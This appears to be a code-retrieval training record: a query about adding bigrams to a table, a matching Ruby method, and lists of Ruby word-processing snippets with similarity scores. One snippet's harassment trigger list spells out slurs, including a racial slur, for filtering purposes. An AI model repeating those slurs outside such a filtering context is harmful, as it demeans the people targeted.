"def get_word_value_array(word)\n html = RestClient.get(\"http://www.thesaurus.com/browse/#{word}\")\n word_string = Nokogiri::HTML(html).css(\"div.relevancy-list ul li a\").to_a\n part_of_speech = Nokogiri::HTML(html).css(\"div.mask ul li a em\")[0].text\n word_definition = Nokogiri::HTML(html).css(\"div.mask ul li a strong\")[0].text\n [word_string, \"(#{part_of_speech}) #{word_definition}\"]\n end",
"def combine_anagrams(words)\n result = []\n words.each do |word|\n anagrams = words.find_all{|item| item.downcase.chars.sort.join == word.downcase.chars.sort.join }\n result.push(anagrams)\n end\n result.uniq\nend",
"def wordArray(guessword)\n word_array = []\n\n guessword.length.times do |letter|\n word_array << guessword[letter]\n end\n return word_array\nend",
"def mcw(word)\n\tindex = 0\n\n\tif $bigrams[word].nil? #if key doesn't exist, then there are no words that follow the given word\n\t\treturn -1\n\telse\n\t\tmax_val = $bigrams[word].max_by{|k,v| v}[1] #get max value\n\t\ttop_keys = $bigrams[word].select{|k, v| v == max_val}.keys #get keys that contain max value\n\tend\n\n\tif !top_keys.empty? #if more than one key is the max, randomly pick one\n\t\tindex = rand(0...top_keys.size)\n\tend\n\treturn top_keys[index]\nend",
"def gyms\n memberships.map do |mem|\n mem.gyms\n end\nend",
"def get_letters(word)\n word.encode('UTF-8').downcase.split(\"\")\n end",
"def word_unscrambler(str, words)\n str_letters = str.split(\"\").sort\n\n res = []\n words.each do |word|\n word_letters = word.split(\"\").sort\n res << word if str_letters == word_letters\n end\n\n res\nend",
"def words\n self.scan(WORD_PATTERN)\n end",
"def find_anagrams(word, dictionary)\n sort_chars = lambda{ |x| x.chars.sort.join }\n anagrams = Hash.new{|h,k| h[k] = [] }\n dictionary.each do |w|\n anagrams[sort_chars.call(w)] << w\n end\n return anagrams[sort_chars.call(word)]\nend",
"def combine_anagrams(words)\r\n\tanagrams = words.group_by { |word| word.chars.sort }.values\t\r\nend",
"def map_words(input)\n results = []\n input.split.each do |word|\n results << yield(word)\n end\n results\nend",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def combine_anagrams(words)\n anagram_group = Hash.new([])\n words.each {|word| anagram_group[word.downcase.split(//).sort.join] += [word]}\n return anagram_group.values\nend",
"def combine_anagrams(words)\r\n buckets = Hash.new([])\r\n words.each do | item |\r\n key = item.downcase.chars.sort.join\r\n\r\n if buckets.has_key?(key)\r\n buckets[key] << item\r\n else\r\n buckets[key] = [item]\r\n end\r\n end\r\n\r\n output = Array.new;\r\n buckets.each do | key, value |\r\n output << value\r\n end\r\n return output\r\nend",
"def stem(word)\n stems = []\n\n FFI::MemoryPointer.new(:pointer) do |output|\n count = Hunspell.Hunspell_stem(self,output,word.to_s)\n ptr = output.get_pointer(0)\n\n if count > 0\n stems = ptr.get_array_of_string(0,count)\n end\n end\n\n return stems.map { |word| force_encoding(word) }\n end",
"def get_my_words\n # Words associated with online harassment\n trigger_words = [\"rape\",\"murder\",\"nigger\",\"slut\",\"whore\",\"bitch\",\"cunt\",\"kill\",\"die\",\"testword\"]\n my_words = Word.where(user_id: self.id)\n my_words.each do |word|\n trigger_words << word.word\n end\n return trigger_words\n end",
"def word_unscrambler(word, dictionary)\nresult = []\ndictionary.each do |entry|\n\tif entry.split(\"\").sort.join(\"\") == word.split(\"\").sort.join(\"\")\n\t\tresult << entry\n\tend\nend\nresult \nend",
"def words\n sentences.map { |sentence| sentence.words.map { |word| word } } .flatten.each\n end",
"def given_word(word)\n @guessword = word.to_s.split('')\n end",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def get_words(text) #no!, two methods named get_words, see word_search.rb\n \twords = text.split('')\n \twords.each do |word|\n \t\t#how to check if word is correct or not?\n \t\tWord.new(name: word, ngsl: false, list: self.id )\n \t\t# example = Wordnik.word.get_top_example(word)['text']\n \tend\n end",
"def combine_anagrams(words)\n\tanagrams_hash = {}\n\twords.map { |w| w.downcase.split(//).sort.join }.each_with_index do |w, i|\n\t\tif anagrams_hash[w].is_a?(Array)\n\t\t\tanagrams_hash[w].push i\n\t\telse\n\t\t\tanagrams_hash[w] = [i]\n\t\tend\n\tend\n\n\treturn anagrams_hash.map { |word, indexes| indexes.map { |index| words[index] } }\nend",
"def words\n @words ||= @string.split(/\\b/).select { |w| w.match /\\w/ }\n end",
"def combine_anagrams(words) \r\n anagrams = words.inject(Hash.new()) do |r, word|\r\n key = word.downcase.chars.sort.join\r\n r[key] ||=[]\r\n r[key] << word\r\n r\r\n end\r\n anagrams.values\r\nend",
"def create_title(word)\n\tcurrent = word\n\tword_num = 1 # begin word number at one\n\ttitle = \"\" # title begins as empty\n\ttitle += word # add current word\n\twhile word_num !=20 # while we have less than 20 words...\n\t\t\tif ($bigrams.has_key?(current)) # if the word exists in the bigram\n\t\t\t\tif (mcw(current) == nil)\n\t\t\t\t\t# do nothing and exit\n\t\t\t\t\tword_num = 20\n\t\t\t\telse\n\t\t\t\t\taddition = mcw(current) # thing to add is mcw\n\t\t\t\t\ttitle += \" \" # add space for readability\n\t\t\t\t\ttitle += addition # add addition to the title\n\t\t\t\t\tcurrent = addition # set current to the new wordtitle += addition # add the mcw\n\t\t\t\t\tword_num += 1 # increment by one and then go throuh\n\t\t\t\tend\n\t\t\telse word_num = 20 # otherwise, we exit\n\t\t\tend\n\t\tend\n\t\treturn title\nend",
"def combine_anagrams(words)\n anagrams = Hash.new()\n words.each do |word|\n letters = word.downcase.gsub(/[^a-z]/, \"\").split(\"\").sort.join\n anagrams[letters] = Array.new unless anagrams.include?(letters)\n anagrams[letters] << word\n end\n anagrams.values\nend",
"def combine_anagrams(words)\r\n hash = Hash.new([])\r\n anagrams = []\r\n words.each do |word|\r\n keyword = word.downcase.chars.sort.join\r\n hash[keyword] += [word]\r\n end\r\n hash.each_value do |words|\r\n anagrams += [words]\r\n end\r\n return anagrams\r\nend",
"def get_word\n @word_to_guess.join\n end",
"def combine_anagrams(words)\r\n words.group_by{|w| w.downcase.chars.sort.to_s}.values\r\nend",
"def grouped_anagrams(strings)\n return [] if strings.empty?\n\n anagram_hash = Hash.new()\n strings.each do |string|\n word_array = string.split(\"\").sort\n if anagram_hash.include?(word_array)\n anagram_hash[word_array] << string\n else\n anagram_hash[word_array] = [string]\n end\n end\n\n result = []\n anagram_hash.each do |key, value|\n result << value\n end\n return result\n\nend",
"def guess_letters\n guess_array = []\n @current_word.each do\n guess_array << \"_\"\n end\n return guess_array\n end"
] | [
"0.72831625",
"0.6997435",
"0.65989906",
"0.6584841",
"0.6568877",
"0.64586675",
"0.63899153",
"0.6331027",
"0.60479885",
"0.584426",
"0.5836713",
"0.58013535",
"0.5772785",
"0.5749296",
"0.5738618",
"0.5575636",
"0.5538728",
"0.5534428",
"0.5527767",
"0.5497996",
"0.5491881",
"0.5456162",
"0.5445743",
"0.54423773",
"0.54392874",
"0.54209054",
"0.5416043",
"0.5400298",
"0.5398422",
"0.53628737",
"0.53485173",
"0.5335734",
"0.5298127",
"0.5287657",
"0.5261903",
"0.5260599",
"0.5238331",
"0.523173",
"0.52262527",
"0.5225119",
"0.5223236",
"0.5222321",
"0.5219524",
"0.52061445",
"0.51988745",
"0.518216",
"0.51708513",
"0.5170725",
"0.5167968",
"0.5153966",
"0.5153651",
"0.5148145",
"0.51399416",
"0.5116051",
"0.5108944",
"0.5100125",
"0.5097525",
"0.5094802",
"0.5094138",
"0.5093021",
"0.50892884",
"0.508519",
"0.5074888",
"0.50636744",
"0.5058012",
"0.5055209",
"0.5050799",
"0.50454265",
"0.5039163",
"0.50371987",
"0.5030881",
"0.5020534",
"0.5019033",
"0.50075096",
"0.5005305",
"0.500367",
"0.49991918",
"0.49871945",
"0.4977321",
"0.49726316",
"0.49726316",
"0.49726316",
"0.49673173",
"0.49647567",
"0.4952888",
"0.49475464",
"0.49436304",
"0.49426013",
"0.49423176",
"0.4936403",
"0.4934934",
"0.49338287",
"0.49253032",
"0.49245858",
"0.4923282",
"0.49215913",
"0.49201706",
"0.49153033",
"0.4910416",
"0.4910293",
"0.49046507"
] | 0.0 | -1 |
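The rows above and below this point document two methods of the same bigram table: `[](word)` returns the follow-words recorded for a word in `@index`, and `add(word1, word2, file=nil)` records a word pair in `@table`, counting each additional file the pair occurs in. Below is a minimal runnable sketch of that class, assuming `@index` defaults every key to an empty array and substituting a hypothetical `Bigram` struct for the dataset's real `Bigram` class (not shown here); unlike the original, it also guards `file!` against a nil file on first insert:

require 'set'

# Hypothetical stand-in for the Bigram class: it only tracks the
# set of files in which a word pair has been seen.
Bigram = Struct.new(:word1, :word2, :files) do
  def file!(file)
    (self.files ||= Set.new) << file
  end
end

class BigramTable
  def initialize
    @table = {}                            # [word1, word2] => Bigram
    @index = Hash.new { |h, k| h[k] = [] } # word1 => list of follow-words
  end

  # Add a bigram; if it is already present, just count the extra file.
  def add(word1, word2, file = nil)
    key = [word1, word2]
    if @table.key?(key)
      @table[key].file!(file) if file
    else
      @table[key] = Bigram.new(word1, word2)
      @table[key].file!(file) if file # guard added; the original calls file! unconditionally
      @index[word1] << word2
    end
  end

  # Follow-words recorded for a given word.
  def [](word)
    @index[word]
  end
end

table = BigramTable.new
table.add("hot", "dog", "a.txt")
table.add("hot", "dog", "b.txt") # pair already present: only its file set grows
table.add("hot", "rod", "a.txt")
p table["hot"] # => ["dog", "rod"]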
Add a bigram to the table. If it is already present, just count the additional file that contains it. | def add(word1, word2, file=nil)
key = [word1,word2]
if @table.key?(key)
@table[key].file!(file) if file
else
bigram = Bigram.new(word1, word2)
@table[key] = bigram
@table[key].file!(file)
@index[word1] << word2
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def add(word1, word2, file)\n if table.key?([word1, word2])\n bigram = table[[word1,word2]]\n else\n bigram = Bigram.new(word1, word2)\n @table[[word1,word2]] = bigram\n @index[word1][word2] = bigram\n end\n bigram.found_in_file(file)\n end",
"def tally!(file_count)\n @table.each do |words, bigram|\n bigram.tally!(table.size, file_count)\n end\n end",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def process_file(file_name)\r\n\tputs \"Processing File.... \"\r\n\r\n\tbegin\r\n\t\tcounter = Hash.new\r\n\t\tfile = File.open(file_name)\r\n\t\tuntil file.eof?\r\n\t\t\tfile.each_line do |line|\r\n\t\t\t\t# do something for each line\r\n\t\t\t\ttitle = cleanup_title(line)\r\n\t\t\t\tunless(title == \"\")\r\n\t\t\t\t\tbigram = title.split().each_cons(2).to_a\r\n\t\t\t\t\tbigram = bigram.map{ |n| n.join(' ')}\r\n\t\t\t\t\tbigram = bigram.each_with_object(Hash.new(0)){|word, obj| obj[word] += 1}\r\n\t\t\t\t\tif bigram.any?\r\n\t\t\t\t\t\tcounter.merge!(bigram) { |k, old, new| old + new}\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\t\tfile.close\r\n\r\n\t\t$bigramsArray = counter.sort_by { |k, v| -v }\r\n\t\tcreate_hash()\r\n\t\t#$bigrams = $bigrams.to_h\r\n\r\n\t\t#$bigramsHash = Hash.new\r\n\t\t#$bigramsHash = $bigrams.to_h\r\n \t#$bigrams.each { |k, v| puts \"#{v} => #{k}\"}\r\n\r\n\r\n\t\tputs \"Finished. Bigram model built.\\n\"\r\n\trescue\r\n\t\tSTDERR.puts \"Could not open file\"\r\n\t\texit 4\r\n\tend\r\n\r\nend",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def add(gbfile)\n compress = false\n if (gbfile.index(\".gz\"))\n system(\"PATH=/usr/bin;zcat #{gbfile} > #{gbfile}.tmp\")\n gbfile = gbfile + \".tmp\"\n compress = true\n end\n FlatFile.new(GenBank, File.new(gbfile)).each {|seq|\n seq.each_cds {|cds|\n @product[cds.assoc[\"protein_id\"]] = cds.assoc[\"product\"]\n @role[cds.assoc[\"protein_id\"]] = cds.assoc[\"note\"].split(\";\")\n }\n }\n File.unlink(gbfile) if compress\n end",
"def add_word(word)\n word_hash = Digest::SHA1.hexdigest(word)\n word_file_path = ROOT_DATA_FOLDER + word_hash\n word_file = File.open(word_file_path, 'a+')\n words = word_file.readlines\n words.each {|word| word.sub! \"\\n\", ''} # remove trailing \\n\n word_index = words.index(word)\n\n if word_index.nil? # add new word to end of file with count = 1\n add_line_to_file(word_file_path, word)\n add_line_to_file(word_file_path, '1')\n else # add count to existing word by replacing count line in file\n word_count = words[word_index + 1].to_i\n add_line_to_file(word_file_path, (word_count + 1).to_s, word_index + 1)\n end\n word_file.close\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# call cleanup_title method to extract song titles\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\t#ignore titles with non-english characters\n\t\t\tif title[/(\\w|\\s|\\')*/] == title\n\t\t\t\ttitle = title.split\n\t\t\t\ti = 0;\n\n\t\t\t\twhile i <= title.size-1 #loop through array of words\n\t\t\t\t\thasKey = $bigrams[title[i]] #first word\n\t\t\t\t\thasChild = $bigrams[title[i]] && $bigrams[title[i]][title[i+1]] #second word that follows first\n\t\t\t\t\tbreak if title[i+1].nil? #break if this is the last word in the array\n\n\t\t\t\t\tif hasChild #if child of primary key exists, add one to the count\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] += 1;\n\t\t\t\t\telsif hasKey #if primary key exists, add new child with initial count = 1\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] = 1;\n\t\t\t\t\telse #if primary key does not exist, add it and child key\n\t\t\t\t\t\t$bigrams[title[i]] = {title[i+1] => 1};\n\t\t\t\t\tend\n\t\t\t\t\ti += 1;\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\t end\nend",
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 
5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' => 2013939,\n'WS' => 1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 
